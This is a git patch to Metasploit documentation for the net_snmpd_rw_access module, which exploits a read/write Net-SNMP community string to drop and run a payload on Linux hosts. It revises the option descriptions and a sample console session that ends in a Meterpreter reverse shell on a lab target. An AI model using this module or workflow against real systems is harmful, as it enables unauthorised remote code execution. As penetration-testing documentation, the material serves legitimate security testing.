From 5f6ecd2ff9158e0843d09a16709caf7bace2f7de Mon Sep 17 00:00:00 2001 From: Steve Date: Wed, 14 Feb 2018 16:58:14 +0000 Subject: [PATCH] Documentation update --- .../exploit/linux/snmp/net_snmpd_rw_access.md | 62 +++++++++++++------ 1 file changed, 44 insertions(+), 18 deletions(-) diff --git a/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md b/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md index 5942b59a1d..12c12f2764 100644 --- a/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md +++ b/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md @@ -15,13 +15,24 @@ 8. You should get a session ## Options - This module accepts 'RHOST' and 'RPORT' to specify target address and port respectively. - 'FILEPATH' specifies where to write the executable out to on the target. Needs to be writable by the SNMP service user. This defaults to /tmp. - 'COMMUNITY' is a read/write community string of the target Net-SNMP service. - 'VERSION' selects the SNMP protocol version. Accepted values are '1' or '2c'. - 'CHUNKSIZE' is the maximum amount of payload bytes to write in a single operation. This value was found through experimentation and may not be suitable in all environments. - 'TIMEOUT' specifies the maximum time to allow SNMP to timeout. + **FILEPATH** + The location to write the executable out to on the target. Needs to be writable by the SNMP service user. This defaults to /tmp. + **COMMUNITY** + The read/write community string of the target Net-SNMP service. + + **VERSION** + The SNMP protocol version. Accepted values are '1' or '2c'. + + + **CHUNKSIZE** + The maximum amount of payload bytes to write in a single operation. This value was found through experimentation and may not be suitable in all environments. + Note that cmdstager payloads are modified to allow further escaping, so the values limits may change between cmdstager flavors. + Possibly related to: [https://sourceforge.net/p/net-snmp/bugs/2542/] + **TIMEOUT** + Specifies the maximum time to allow SNMP to timeout. + + ## Scenario ``` @@ -63,9 +74,15 @@ FILEPATH /tmp yes file path to write to RETRIES 1 yes SNMP Retries RHOST 192.168.1.3 yes The target address - RPORT 161 yes The target port (UDP) + RPORT 161 yes The target port (TCP) + SHELL /bin/bash yes Shell to call with -c argument + SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 + SRVPORT 8080 yes The local port to listen on. + SSL false no Negotiate SSL for incoming connections + SSLCert no Path to a custom SSL certificate (default is randomly generated) TIMEOUT 1 yes SNMP Timeout - VERSION 2c yes SNMP Version <1/2c> + URIPATH no The URI to use for this exploit (default is random) + VERSION 2c yes SNMP Version <1/2c> Payload information: Space: 4096 @@ -79,16 +96,25 @@ https://www.intelisecure.com msf exploit(linux/snmp/net_snmpd_rw_access) > run - + [*] Started reverse TCP handler on 192.168.1.2:4444 - [*] Writing to NET-SNMP-EXTEND-MIB with given payload - [*] Payload generated. Sending in 200 byte chunk increments. - [*] Sent chunked executable. Now executing payload - [*] Sending stage (849108 bytes) to 192.168.1.3 - [+] SNMP request timeout (this is promising). - + [*] Command Stager progress - 1.11% done (199/17924 bytes) + [*] Command Stager progress - 2.23% done (399/17924 bytes) + [*] Command Stager progress - 3.34% done (598/17924 bytes) + [*] Command Stager progress - 4.45% done (797/17924 bytes) + ... Redacted ... + [*] Command Stager progress - 98.64% done (17681/17924 bytes) + [*] Command Stager progress - 99.72% done (17873/17924 bytes) + [*] Sending stage (857352 bytes) to 192.168.1.3 + [*] Meterpreter session 30 opened (192.168.1.2:4444 -> 192.168.1.3:54230) at 2018-02-14 16:52:49 +0000 + [-] Exploit failed: SNMP::RequestTimeout host 192.168.1.3 not responding + [*] Exploit completed, but no session was created. + msf exploit(linux/snmp/net_snmpd_rw_access) > sessions -i 30 + [*] Starting interaction with 30... + + meterpreter > getuid + Server username: uid=121, gid=129, euid=121, egid=129 meterpreter > exit - [*] Shutting down Meterpreter... - - [*] 192.168.1.3 - Meterpreter session 1 closed. Reason: User exit + [*] 192.168.1.3 - Meterpreter session 30 closed. Reason: User exit + ```